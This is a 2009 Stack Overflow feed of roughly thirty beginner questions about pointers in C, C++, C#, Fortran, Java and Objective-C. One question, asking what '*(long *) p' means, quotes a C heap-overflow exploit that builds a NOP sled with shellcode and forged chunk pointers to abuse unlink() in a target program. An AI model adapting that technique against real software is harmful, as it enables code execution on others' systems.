active questions tagged pointers - Stack Overflowmost recent 30 from stackoverflow.com2009-12-17T18:08:47Zhttp://stackoverflow.com/feeds/tag/pointershttp://www.creativecommons.org/licenses/by-nc/2.5/rdfhttp://stackoverflow.com/questions/1919718/pass-by-reference-in-c0Pass by reference in CPhenom2009-12-17T05:51:53Z2009-12-17T06:17:10Z
<p>I'm trying to use pass by reference in C so that the function can modify the values of the parameters passed to it. This is the function signature:</p>
<pre><code>int locate(char *name, int &s, int &i)
</code></pre>
<p>However when I try to compile it I get this error that refers specifically to the above line:</p>
<blockquote>
<p>error: expected ‘;’, ‘,’ or ‘)’ before
'&' token</p>
</blockquote>
<p>If I remove the '&' the program will compile, but it will not function correctly, obviously. What's wrong here? How can I make call by reference work?</p>
http://stackoverflow.com/questions/1501292/how-do-you-decipher-complex-declarations-of-pointersarrays1How do you decipher complex declarations of pointers+arrays?AraK2009-10-01T00:08:18Z2009-12-16T19:47:04Z
<p>Although I use <code>std::vector</code> almost all the time, I am interested in understanding as much as I can about pointers. Examples of what I am talking about:</p>
<pre><code>char* array[5]; // What does it mean?
// 1) pointer to an array of 5 elements!
// 2) an array of 5 pointers?
</code></pre>
<p>I am interested in the precise definition of this declaration.</p>
http://stackoverflow.com/questions/1916189/c-create-managed-array-from-pointer0C# -- Create Managed Array from PointerLimited Atonement2009-12-16T17:17:17Z2009-12-16T19:39:44Z
<p>Dear Sirs,</p>
<p>I'm trying to create a Managed Array of doubles from an array of bytes. I have the problem working currently, but I wanted to optimize. Here's some code that I would like to work:</p>
<pre><code>private unsafe static double[] _Get_Doubles(byte[] _raw_data)
{
double[] ret;
fixed (byte* _pd = _raw_data)
{
double* _pret = (double*)_pd;
ret = (double[])*_pret; //FAILURE
}
}
</code></pre>
<p>Please let me know how to cope with these problems.</p>
<p>-Aaron</p>
http://stackoverflow.com/questions/608175/what-does-this-error-mean-error-expected-specifier-qualifier-list-before-type2What does this error mean: "error: expected specifier-qualifier-list before 'type_name'"?Paul Wicks2009-03-03T21:04:00Z2009-12-16T15:14:47Z
<p>I'm a bit new to working with c/c++, so sorry if this is a dumb question. I've been working on the Cell processor and I'm trying to create a struct that will hold an spe_context_ptr_t, which will be used within the thread to launch an spe context and will also hold a pointer to something else that will be passed to the spu context from within the thread (currently I'm trying to just make it a generic pointer, but in actuality it will be a pointer to another structure I've defined). When I try and compile, I get the following error:</p>
<pre><code>spu/../common.h:38: error: expected specifier-qualifier-list before 'spe_context_ptr_t'
// here is the offending line(s)
typedef struct _PTHREAD_BLOCK {
spe_context_ptr_t * context; // Error happens here
uintptr32_t args;
} PTHREAD_BLOCK;
</code></pre>
http://stackoverflow.com/questions/1910832/c-why-arent-pointers-initialized-with-null-by-default4[C++] Why aren't pointers initialized with NULL by default?Jonathan2009-12-15T22:19:51Z2009-12-16T09:31:57Z
<p>Hi,</p>
<p>I guess this have been answered before, but I just couldn't find the answer here or on google, but I think that it is because I couldn't type the right question...</p>
<p>oh well,
can someone please explain why aren't pointers initialized to NULL?<br>
example:</p>
<pre><code> void test(){
char *buf;
if (!buf)
// whatever
}
</code></pre>
<p>the programm wouldn't step inside the if because buf is not null </p>
<p>I would like to know why, in what case do we need a variable with trash on, specially pointers addressing to trash on the memory</p>
<p>Thanks,<br>
Joe</p>
http://stackoverflow.com/questions/1911919/pointer-to-a-casted-pointer1Pointer to a casted Pointer?Grey2009-12-16T02:42:18Z2009-12-16T04:54:11Z
<p>I've come across pointers to casted pointers (not sure that this is the correct term) in C such as:</p>
<p>*(long *) p = 10; I could never for the life of me understand what it means, or, the other example:</p>
<p>*(void *) NULL, or *(char *) 0; I just can't wrap my head around it, could someone please explain this to me, and save me from partial brain damage? :)</p>
<p>Thanks</p>
<p>(P.S An example is shown below of such usage)</p>
<blockquote>
<p>int main(int argc, char *argv[]) {
char *p, *payload = (char *) malloc(1052);</p>
<pre><code> p = payload;
memset(p, '\x90', 1052);
/* Jump 12 ahead over the trashed word from unlink() */
memcpy(p, "\xeb\x0c", 2);
/* We put the shellcode safely away from the possibly corrupted area */
p += 1020 - 64 - sizeof(shellcode);
memcpy(p, shellcode, sizeof(shellcode) - 1);
/* Set up the prev_size and overflow size fields */
p += sizeof(shellcode) + 64 - 4;
*(long *) p = -4;
p += 4;
*(long *) p = -16;
/* Set up the fwd and bck of the fake chunk */
p += 8;
*(long *) p = RETLOC - 12;
p += 4;
*(long *) p = RETADDR;
p += 4;
*(p) = '\0';
execl("./wilderness", "./wilderness", payload, NULL); }
</code></pre>
</blockquote>
http://stackoverflow.com/questions/1911117/is-there-a-use-for-uninitialized-pointers-in-c-or-c4Is there a use for uninitialized pointers in C or C++?John W2009-12-15T23:08:29Z2009-12-16T00:46:21Z
<p>In one of the comments in <a href="http://stackoverflow.com/questions/1910832/c-why-arent-pointers-initialized-with-null-by-default">this question</a>, it was brought out that initializing C++ pointers by default would break compatibility with C.</p>
<p>That's fine, but why would something like this matter? I would think the only time it would actually matter is if I <em>wanted</em> an uninitialized pointer for some reason. But I can't think of a reason why I would want to have that.</p>
<p>Is there a use for uninitialized pointers? Or is the compatibility issue merely one of compatible behavior (i.e., not increasing overhead) and not one of breaking code?</p>
http://stackoverflow.com/questions/1907668/what-do-i-need-to-know-about-memory-in-c8What do I need to know about memory in C++?Christopher W. Allen-Poole2009-12-15T14:01:18Z2009-12-16T00:34:54Z
<p>I've been doing my best to learn C++ but my previous training will fall short in one major issue: memory management. My primary languages all have automatic garbage collection, so keeping track of everything has never really been necessary. I've tried reading up on memory management in C++ online, but I have this shaking suspicion that I am strill missing something.</p>
<p>So, here's a multi-part question:</p>
<ul><li>What is the bare minimum I need to know about memory management? (or, where do I go to find that out)?</li><li>Where do I go for intermediate and advanced knowledge/tutorials/etc (once I am done with the basics)?</li><br/>More specifically:<li>What is the performance difference between pointers and references?</li><li>I've heard that in loops, you need to make sure that you call <code>delete</code> on any new pointers before the loop re-iterates. Is this correct? Do you need to do something with references?</li><li>What are some classic examples of memory leaks?</li><li>What do I need to know about the following (and will I ever realistically need to use them -- if so, where?):
<ul><li><code>malloc</code></li><li><code>free</code></li><li><code>calloc</code></li><li><code>realloc</code></li></ul></li></ul>
<p><strong>*******************</strong> UPDATE <strong>***************</strong></p>
<p>This is to address a reference to lmgtfy in comment one (by Ewan). If you start reading the information which is available there, it is not useful to the beginner. It is great theory, I think, but it is neither pertinent or useful to this question.</p>
http://stackoverflow.com/questions/1907921/can-using-0l-to-initialize-a-pointer-in-c-cause-problems1Can using 0L to initialize a pointer in C++ cause problems?sharptooth2009-12-15T14:44:26Z2009-12-15T22:57:39Z
<p>In <a href="http://stackoverflow.com/questions/1907795/what-is-going-on-at-the-top-of-this-function">this question</a> an initializer is used to set a pointer to null. Instead of using value of <code>0</code> value of <code>0L</code> is used. I've read that one should use exactly <code>0</code> for null pointers because exact null pointer representation is implementation-specific.</p>
<p>Can using <code>0L</code> to set a pointer to null cause problems while porting?</p>
http://stackoverflow.com/questions/1909406/associated-pointers-in-derived-type-gfortran-vs-intel1Associated pointers in derived type? gFortran vs. Intelremek2009-12-15T18:27:58Z2009-12-15T20:04:37Z
<p>Hello,</p>
<p>I would like to check if a pointer inside a derived type has already been defined or not. I wrote the following simple code to show you my problem: </p>
<pre><code>program test
implicit none
type y
real(8), pointer :: x(:)
end type y
type(y), pointer :: w(:)
allocate(w(2))
allocate(w(1)%x(2))
write(*,*) associated(w(1)%x), associated(w(2)%x)
end program test
</code></pre>
<p>Compiling this code with gFortran 4.4.1 and running it on Ubuntu gives the result:</p>
<pre><code>T F
</code></pre>
<p>whereas the same code compiled on Windows Vista with the Intel Fortran compiler 11.0 provides:</p>
<pre><code>T T
</code></pre>
<p>The first result (gFortran) is what I am actually expecting. But the fact that the Intel compiler provides a different result makes me fear my code might not be correct. Am I doing something terribly wrong with the pointers in this example? Any idea or explanation? </p>
<p>Many thanks in advance for your help!</p>
http://stackoverflow.com/questions/1908341/is-c-the-single-language-that-have-both-pointers-and-references1Is C++ the single language that have both pointers and references?dtrosset2009-12-15T15:50:12Z2009-12-15T19:50:15Z
<p>Amongst the programming languages I know and those I've been exposed to, C++ looks like the only one to have both pointers and references. Is it true?</p>
http://stackoverflow.com/questions/1906000/c-by-reference-argument-and-c-linkage7C++ by-reference argument and c linkageolovb2009-12-15T08:40:02Z2009-12-15T12:25:47Z
<p>Hi,</p>
<p>I have encountered a working (with XLC8 and MSFT9 compilers) piece of code, containing a c++ file with a function defined with c linkage and a reference argument. This bugs me, as references are c++ only. The function in question is called from c code, where it is declared as taking a pointer argument to the same type in place of the reference argument.</p>
<p><strong>Simplified example</strong>:</p>
<p><em>c++ file</em>:</p>
<pre><code>extern "C" void f(int &i)
{
i++;
}
</code></pre>
<p><em>c file</em>:</p>
<pre><code>void f(int *);
int main()
{
int a = 2;
f(&a);
printf("%d\n", a); /* Prints 3 */
}
</code></pre>
<p>Now, the word on the street is that most c++ compilers, under the hood, implement references just like a pointer. Is that and just pure luck the reason this code works or does it say somewhere in the c++ specification what the result is when you define a function with a reference argument and c linkage? I haven't been able to find any info on this.</p>
http://stackoverflow.com/questions/1906233/pointer-to-array0pointer to arraykelton522009-12-15T09:33:14Z2009-12-15T10:52:50Z
<p>I'm wondering, can you make a pointer to a group of variables in an array?
like this</p>
<pre><code>array[20]{'a','b','c',...}
pointer = array[6 through 10];
</code></pre>
<p>so then you could say...</p>
<pre><code>*pointer[0] == array[6];
</code></pre>
<p>and </p>
<pre><code>*pointer[5] == array[10];
</code></pre>
<p>and the length of *pointer</p>
<pre><code>5 == sizeof(*pointer) \ sizeof(type);
</code></pre>
<h2>OK</h2>
<p>Let me explain what I'm trying to accomplish, maybe that will clear me up a bit.
I want to read a full file into a buffer, but I want to do it piece by piece. passing a small array into read() and then looping it into the larger array defeats the purpose. I was hoping that I could directly 'point' to an area in the buffer I want to fill, and pass that to the read() function. </p>
<h3>I DO NOT want to use streams or anything that buffers behind my back</h3>
<p>that would be counterproductive as I'm trying read the whole file into memory at once. As fast as possible.</p>
<h2>I need speed!!!</h2>
http://stackoverflow.com/questions/658133/c-when-to-use-pointers5c++: when to use pointers?presario2009-03-18T12:49:05Z2009-12-15T07:55:11Z
<p>After reading some tutorials I came to the conclusion that one should always use pointers for objects. But I have also seen a few exceptions while reading some QT tutorials (<a href="http://zetcode.com/tutorials/qt4tutorial/painting/" rel="nofollow">http://zetcode.com/tutorials/qt4tutorial/painting/</a>) where QPaint object is created on the stack. So now I am confused. When should I use pointers?</p>
http://stackoverflow.com/questions/1899954/dynamic-memory-created-inside-a-function4dynamic memory created inside a function tomkaith132009-12-14T09:48:48Z2009-12-14T18:46:47Z
<p>I would like to know the technical reason(in terms of memory) why this piece of code will not work:</p>
<pre><code>#include <stdio.h>
#include <stdlib.h>
int* fun(int*);
int main()
{
int a=5;
int* ptr;
// ptr=(int*)malloc(sizeof(int));
fun(ptr);
a=*ptr;
printf("\n the val of a is:%d",a);
return 0;
}
void fun(int* ptr)
{
ptr = (int*)malloc(sizeof(int));
*ptr = 115;
}
</code></pre>
<p>Why will this not work? I thought that the heap(more importantly the addresses) is common to all the function's variables in the stack . </p>
<p>Also, why would this work.
If i comment the memory allocation inside the function fun and uncomment the one in main . It works fine.</p>
http://stackoverflow.com/questions/1898900/question-about-passing-a-variable-created-in-a-function0Question about passing a variable created in a functiontomkaith132009-12-14T04:19:09Z2009-12-14T15:47:52Z
<p>Suppose there exists a function which returns a message
say of the following format:</p>
<pre><code>struct message
{
void* data;
}msgG;
</code></pre>
<p>Which would be the best way to extract the data (i.e. Get the message accessible to fun1 in the code):
1- using a global variable
2- Using double pointers(pointer to a pointer)</p>
<pre><code>//Note: msgG is the global variable
void fun2(struct message **ptr)
{
**ptr = msgCreate(); // msgCreate returns a type struct message;
msgG = msgCreate();
}
void fun1()
{
....
.....
struct message *ptr;
ptr = malloc(sizeof(struct message));
fun2(&ptr);
...
}
</code></pre>
<p>Now we have the message stored in msgG and ptr ?
Which is the better one? Using global variable or accessing the pointer since one is allocated in the heap and the other in the bss(not sure of this)??
Is there any other way to deal with this kind of situation?</p>
http://stackoverflow.com/questions/1901051/do-pointers-in-java-actually-exist1Do pointers in java actually exist?Jeffrey Vandenborne2009-12-14T13:01:51Z2009-12-14T15:31:58Z
<p>I thought I'm pretty experienced in java, but it seems that's not really the case, I just noticed something yesterday, something I used before but never really realised what it did. I googled but didn't find the answer to my question.</p>
<p>If I declare an int array, and use Array's static sort function to sort my array, I just need to type </p>
<pre><code>Arrays.sort( numbers );
</code></pre>
<p>Instead of</p>
<pre><code>numbers = Array.sort( numbers );
</code></pre>
<p>This might look very easy in C and C++ because you can use pointers there. So what I'm wondering is, how is this done? Is it an advantage sun has, or am I completely senseless here?</p>
http://stackoverflow.com/questions/1898524/difference-between-pointer-to-a-reference-and-reference-to-a-pointer6Difference between pointer to a reference and reference to a pointerbakore2009-12-14T01:44:02Z2009-12-14T09:43:34Z
<p>What is the difference between pointer to a reference, reference to a pointer and pointer to a pointer in C++?</p>
<p>Where should one be preferred over the other?</p>
http://stackoverflow.com/questions/1863466/c-pointers-vs-objective-c-pointers3C pointers vs. Objective-C pointersDave2009-12-07T22:48:13Z2009-12-14T09:41:35Z
<p>Hello! I'm coming from an Objective-C background and am trying to expand my knowledge in C. One thing has me confused, however, and that's the difference between pointers in C and Obj-C. As you can see in the examples below, things seem to behave a bit differently between both languages, and I was wondering if you could help explain why?</p>
<p><strong>C code works fine:</strong></p>
<pre><code>void myFunction()
{
int x, *pointerX;
pointerX = &x;
*pointerX = 5;
// Prints: "x is 5"
printf("x is: %i", x);
}
</code></pre>
<p><strong>Obj-C code fails:</strong></p>
<pre><code>- (void) myMethod
{
NSString *string = @"Caramel coffee", *stringPointer;
stringPointer = &string; // Warning: Assignemnt from incompatible pointer type
*stringPointer = @"Chocolate milkshake"; // Exception: Incompatible types in assignment
NSLog(@"string is: %@", string);
}
</code></pre>
<p><strong>Question:</strong> Why can't I assign stringPointer to the memory address of string (<code>stringPointer = &string;</code>), and why am I able to perform <code>*pointerX = 5;</code> under C, but I can't perform <code>*stringPointer = @"Chocolate milkshake";</code> under Objective-C?</p>
<p>I realize that Obj-C deals with objects and C doesn't, but I can't seem to figure out the behind-the-scenes details as to why it doesn't work in Obj-C. Any help is greatly appreciated. Thanks! :)</p>
http://stackoverflow.com/questions/1892198/whats-the-difference-between-pointers-and-global-variables-in-c1What's the difference between Pointers and Global Variables in C?Kaji2009-12-12T03:46:02Z2009-12-13T11:16:32Z
<p>I'm reading <a href="http://publications.gbdirect.co.uk/c_book/" rel="nofollow">The C Book</a> to try and get a better foundation in C. While I think I'm generally getting the concept of pointers, one thing sticks out to me is that it seems like it's generalizing whatever it's pointing to into a global variable (e.g. the ability to use pointers to return values from <code>void</code> functions), which naturally carries with it all the attendant dangers, I assume.</p>
<p>Aside from the fact that a pointer references a specific variable or index in an array, what <b>is</b> the difference between a pointer and a global variable?</p>
http://stackoverflow.com/questions/1894913/c-operator-meaning-in-array-assignment0C * operator meaning in array assignment bigben2009-12-12T22:32:59Z2009-12-12T23:11:11Z
<p>What does this line mean? I havn't done C in a few years. Does it perform the operation in parens then make the int result a pointer?? </p>
<pre><code>b[0] = *(start + pos++);
</code></pre>
http://stackoverflow.com/questions/1206579/memory-location-of-enum-value-in-c4Memory location of enum value in Colovb2009-07-30T13:23:11Z2009-12-12T19:50:24Z
<p>I think I've read somewhere that <strong>it is illegal to take the address of an enum value</strong> in C (enum values not being lvalues; however, I can't find any information on this now). Is that correct and, if so, why?</p>
<p><hr></p>
<p>Edit:</p>
<p>Here's an example that clarifies what I mean by "enum value" above. I mean taking the address of <code>first_value</code> below, not taking the address of an actual instance of an enum:</p>
<pre><code>enum myenum
{
first_value,
second_value
};
</code></pre>
http://stackoverflow.com/questions/674494/problems-wrapping-patricia-tries-using-swig-python0problems Wrapping Patricia Tries using Swig, pythonGregg Lind2009-03-23T17:52:17Z2009-12-12T07:00:03Z
<p>Hello all! </p>
<p>I'm trying to wrap the Patricia Tries (Perl's NET::Patricia) to be exposed in python. I am having difficulty with one of the classes.</p>
<p>So instances the patricia node (below) as viewed from python have a "data" property. Reading it goes fine, but writing to it breaks.</p>
<pre><code>typedef struct _patricia_node_t {
u_int bit; /* flag if this node used */
prefix_t *prefix; /* who we are in patricia tree */
struct _patricia_node_t *l, *r; /* left and right children */
struct _patricia_node_t *parent;/* may be used */
void *data; /* pointer to data */
void *user1; /* pointer to usr data (ex. route flap info) */
} patricia_node_t;
</code></pre>
<p>Specifically:</p>
<pre><code>>>> N = patricia.patricia_node_t()
>>> assert N.data == None
>>> N.data = 1
TypeError: in method 'patricia_node_t_data_set', argument 2 of type 'void *'
</code></pre>
<p>Now my C is weak. From what I read in the SWIG book, I think this means I need to pass it a pointer to data. According to <a href="http://www.swig.org/Doc1.3/Python.html#Python%5Fnn18" rel="nofollow">the book</a> :</p>
<blockquote>
<p>Also, if you need to pass the raw pointer value to some external python library, you can do it by casting the pointer object to an integer... However, the inverse operation is not possible, i.e., you can't build a Swig pointer object from a raw integer value. </p>
</blockquote>
<p>Questions:</p>
<ol>
<li>am I understanding this correctly?</li>
<li>how do I get around this? Is %extends? typemap? Specifics would be very helpful.</li>
</ol>
<p>Notes:</p>
<ol>
<li>I can't change the C source, but I can extend it in additional .h files or the interface .i file. </li>
<li>From what I understand, that "data" field should be able to contain "anything" for some reasonable value of "anything" that I don't really know.</li>
</ol>
http://stackoverflow.com/questions/1876150/simple-efficient-weak-pointer-that-is-set-to-null-when-target-memory-is-dealloca2Simple, efficient weak pointer that is set to NULL when target memory is deallocatedwonsungi2009-12-09T19:15:15Z2009-12-12T05:47:24Z
<p><strong>Is there a simple, efficient weak/guarded pointer?</strong> I need multiple pointers to the same object that are all automatically set to NULL when the object is deleted. There is one "master" pointer that is always used to delete the object, but there can be several other pointers that reference the same object.</p>
<p><strong>Here are some solutions that don't quite match my needs:</strong></p>
<ul>
<li><a href="http://stackoverflow.com/questions/909437/is-there-a-smart-pointer-that-is-automatically-nulled-when-its-target-is-destroye">QPointer</a>: I am not developing a QT app; I do not wish to include this libary/derive from QObject.</li>
<li><a href="http://www.boost.org/doc/libs/1%5F41%5F0/libs/smart%5Fptr/weak%5Fptr.htm" rel="nofollow">boost::weak_ptr</a>: <s>an exception is thrown when accessing a deallocated object. Too expensive for my situation: it should be normal to test a weak pointer; I plan to do some manual clean-up when a weak pointer is no longer valid.</s> <strong>update</strong>:weak_ptr can be tested without throwing exceptions</li>
<li><a href="http://lukepalmer.wordpress.com/2006/07/11/low-overhead-weak-pointers/" rel="nofollow">Low-Overhead Weak Pointers</a>: This is very close to what I am looking for, except I don't like the fact "This scheme is only guaranteed to work as long as you don’t allocate 2**sizeof(int) times in the same location."</li>
</ul>
<p><strong>Why I need these weak/guarded pointers:</strong>
I have a game with a list of game objects. Some objects are dependent on others, for example a debug/stats object that is associated with a game entity. The debug/status object displays useful info about the game entity, but it only makes sense while the game entity exists. So if the game entity is deleted, the debug/stats object should realize this and delete itself. (Another idea is a tracking missile: instead of deleting itself, it may search for a new target.)</p>
<p>I wish to keep the debug/stats logic separate from the game entity. The game entity should not have to know a debug/stats object is attached to it. While I'd prefer an answer for weak/guarded pointers, I also welcome different ways to approach my specific task. I am thinking I may have to implement a <a href="http://www.gamasutra.com/view/feature/4015/managing%5Fdata%5Frelationships.php?print=1" rel="nofollow">game object manager</a> that tracks object lifetimes and uses handles instead of raw pointers to memory addresses.</p>
<p>I am developing in C++.</p>
http://stackoverflow.com/questions/1892092/double-free-error-with-pointer-to-array-of-mpzt0double free error with pointer to array of mpz_tteflon192009-12-12T02:49:34Z2009-12-12T03:06:52Z
<p>Hi,</p>
<p>I'm currently learning libgmp and to that end I'm writing a small program which find prime factors. My program calls a function which fills an array with a varying amount of mpz_t integers, prime factors of a given number, which I need to return. I'm planning on setting the last element to NULL, so I know how many mpz_t integers the function found.</p>
<p>My problem is I'm getting double free errors with my array of pointers to mpz_t integers. I've written up some sample code illustrating my problem:</p>
<pre><code>#include <stdlib.h>
#include <stdio.h>
#include <gmp.h>
int main(void)
{
mpz_t *p = malloc(5*sizeof(mpz_t*));
mpz_init_set_ui(p[0], 2UL);
mpz_init_set_ui(p[1], 5UL);
gmp_printf("%Zd %Zd\n", p[0], p[1]);
mpz_clear(p[0]);
mpz_clear(p[1]);
free(p);
return 0;
}
</code></pre>
<p>2 and 5 are printed to stdout, so allocation seems to be fine. But I'm getting the double free error below:</p>
<pre><code>2 5
*** glibc detected *** ./lol: double free or corruption (out): 0x08e20020 ***
======= Backtrace: =========
/lib/libc.so.6(+0x6b6c1)[0xb77126c1]
/lib/libc.so.6(+0x6cf18)[0xb7713f18]
/lib/libc.so.6(cfree+0x6d)[0xb7716f8d]
/usr/lib/libgmp.so.3(__gmp_default_free+0x1d)[0xb77f53fd]
/usr/lib/libgmp.so.3(__gmpz_clear+0x2c)[0xb77ff08c]
./lol[0x80485e3]
/lib/libc.so.6(__libc_start_main+0xe6)[0xb76bdb86]
./lol[0x80484e1]
</code></pre>
<p>I'm still getting totally used to pointers, and gcc gives no errors, however I'm fairly sure this is wrong and I should be doing something like</p>
<pre><code>mpz_init_set_ui(*p[0], 2UL);
</code></pre>
<p>instead of:</p>
<pre><code>mpz_init_set_ui(p[0], 2UL);
</code></pre>
<p>But that gives me a compiler error</p>
<pre><code>test.c:8: error: incompatible type for argument 1 of ‘__gmpz_init_set_ui’
/usr/include/gmp.h:925: note: expected ‘mpz_ptr’ but argument is of type ‘__mpz_struct’
</code></pre>
<p>Anyway, my questions are:</p>
<ol>
<li>I'm sure I should be dereferencing the pointer in the mpz_init_set_ui() call, why is that wrong?</li>
<li>Is there a better way of doing this? Should I use a linked list?(I've not learned linked lists yet, I figure an array is best for this but if I'm really making things way more difficult, tell me)
3.Would it be better to create a struct with a pointer to my array and another variable with the amount of elements in my array and return a pointer to that instead?</li>
</ol>
<p>The platform is linux 32-bit just in case that's relevant.</p>
<p>Here is the code I have just now, which I want to modify, I declare the array of mpz_t on the stack. But I want to make main() a function:</p>
<pre><code>#include <stdio.h>
#include <stdlib.h>
#include "prime.h"
#define MAXFACTORS 100
int main(void)
{
mpz_t numToFactor, factor;
mpz_t result;/* used to pass return values from getPrimeFactor() */
mpz_t primeFactors[MAXFACTORS];
mpz_init_set_str(numToFactor, "18 446 744 073 709 551 615 436 457 568", 10);
mpz_init(factor);
mpz_init(result);
int pFLen = 0;
mpz_init(primeFactors[pFLen]);
getPrimeFactor(numToFactor, result);
mpz_set(factor, result);
while(mpz_cmp_ui(factor, 0UL))
{
mpz_set(primeFactors[pFLen], factor);
pFLen++;
if(pFLen == MAXFACTORS)
{
puts("Ran out of space to store prime factors, quitting...");
}
mpz_init(primeFactors[pFLen]);
mpz_divexact(factor, numToFactor, factor);
mpz_set(numToFactor, factor);
getPrimeFactor(factor, result);
mpz_set(factor, result);
}
mpz_set(primeFactors[pFLen], numToFactor);
pFLen++;
int i;
for(i = 0; i < pFLen; i++)
{
gmp_printf("%Zd ", primeFactors[i]);
}
puts("");
mpz_clear(numToFactor);
mpz_clear(factor);
return 0;
}
</code></pre>
<p>Thanks in advance people,</p>
http://stackoverflow.com/questions/1844733/is-this-c-function-written-in-poor-form5Is this C function written in poor form?Nate2009-12-04T03:54:24Z2009-12-11T22:16:13Z
<pre><code>char byte_to_ascii(char value_to_convert, volatile char *converted_value) {
if (value_to_convert < 10) {
return (value_to_convert + 48);
} else {
char a = value_to_convert / 10;
double x = fmod((double)value_to_convert, 10.0);
char b = (char)x;
a = a + 48;
b = b + 48;
*converted_value = a;
*(converted_value+1) = b;
return 0;
}
}
</code></pre>
<p>The purpose of this function is to take an unsigned char value of 0 through 99 and return either it's ascii equivalent in the case it is 0-9 or manipulate a small global character array that can be referenced from the calling code following function completion. </p>
<p>I ask this question because two compilers from the same vendor interpret this code in different ways. </p>
<p>This code was written as a way to parse address bytes sent via RS485 into strings that can easily be passed to a send-lcd-string function. </p>
<p>This code is written for the PIC18 architecture (8 bit uC). </p>
<p>The problem is that the free/evaluation version of a particular compiler generates perfect assembly code that works while suffering a performance hit, but the paid and supposedly superior compiler generates code more efficiently at the expense of being able reference the addresses of all my byte arrays used to drive the graphics on my lcd display. </p>
<p>I know I'm putting lots of mud in the water by using a proprietary compiler for a less than typical architecture, but I hope someone out there has some suggestions. </p>
<p>Thanks.</p>
http://stackoverflow.com/questions/1891101/return-pointer-from-function-c3Return pointer from function CKJ00902009-12-11T21:51:48Z2009-12-11T21:55:34Z
<p>In my C program this function is going to handle all the work of opening a specific file and then return the file pointer, so main or other functions can read the content by using fp, but so far i haven't been able to get this to work.</p>
<p>I'm just learning the language, so it is possible that i am doing something very wrong.</p>
<pre><code>int open_text_file(char text_file_name[])
{
FILE *fp;
if((fp = fopen(text_file_name, "r")) != 0)
{
return fp;
}
else
{
printf("Cannot open file \"%s\"\n", text_file_name);
}
}
</code></pre>
http://stackoverflow.com/questions/1888652/how-can-i-use-iteration-instead-of-recursion-to-input-values-into-a-linked-list1How can I use iteration instead of recursion to input values into a linked list?Brandon2009-12-11T15:02:54Z2009-12-11T15:20:54Z
<p>Ok so let's say we have a linked list of characters with a head pointer. How can I create a loop to enter a string of characters into the linked list? My problem is when I think of head and head->next and head->next->next . . . it only seems natural to use a recursive function to set the characters at each node.</p>
http://stackoverflow.com/questions/1884061/c-delegate-with-ref-parameter0C# - Delegate with ref parameterTaylor L2009-12-10T21:13:45Z2009-12-10T21:20:04Z
<p>Is there any way to maintain the same functionality in the code below, but without having to create the delegate? I'm interfacing with a 3rd-party API that contains a number of various DeleteSomethingX(ref IntPtr ptr) methods and I'm trying to centralize the code for the IntPtr.Zero check. </p>
<pre><code>private void delegate CleanupDelegate(ref IntPtr ptr);
...
private void Cleanup(ref IntPtr ptr, CleanupDelegate cleanup)
{
if (ptr != IntPtr.Zero)
{
cleanup(ref ptr);
}
}
</code></pre>
http://stackoverflow.com/questions/608511/initializing-an-array-of-pointers-to-pointers1Initializing an array of pointers to pointersRee2009-03-03T22:31:37Z2009-12-10T13:59:55Z
<p>This example works fine:</p>
<pre><code>static char *daytab[] = {
"hello",
"world"
};
</code></pre>
<p>This doesn't:</p>
<pre><code>static char *daytab[] = {
{0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31},
{0, 31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31}
};
</code></pre>
<p>The way I see it is that the first example creates an array that is filled with pointers to the two string literals (which themselves are arrays). The second example, IMO, should be identical - create an array and fill it with pointers to the two char arrays.</p>
<p>Could someone explain to me why the second example is wrong?</p>
<p>P.S. You could probably write it like this (haven't tested it):</p>
<pre><code>static char a[] = {0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31};
static char b[] = {0, 31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31};
static char *daytab[] = {
a,
b
};
</code></pre>
<p>But that looks like too much work :).</p>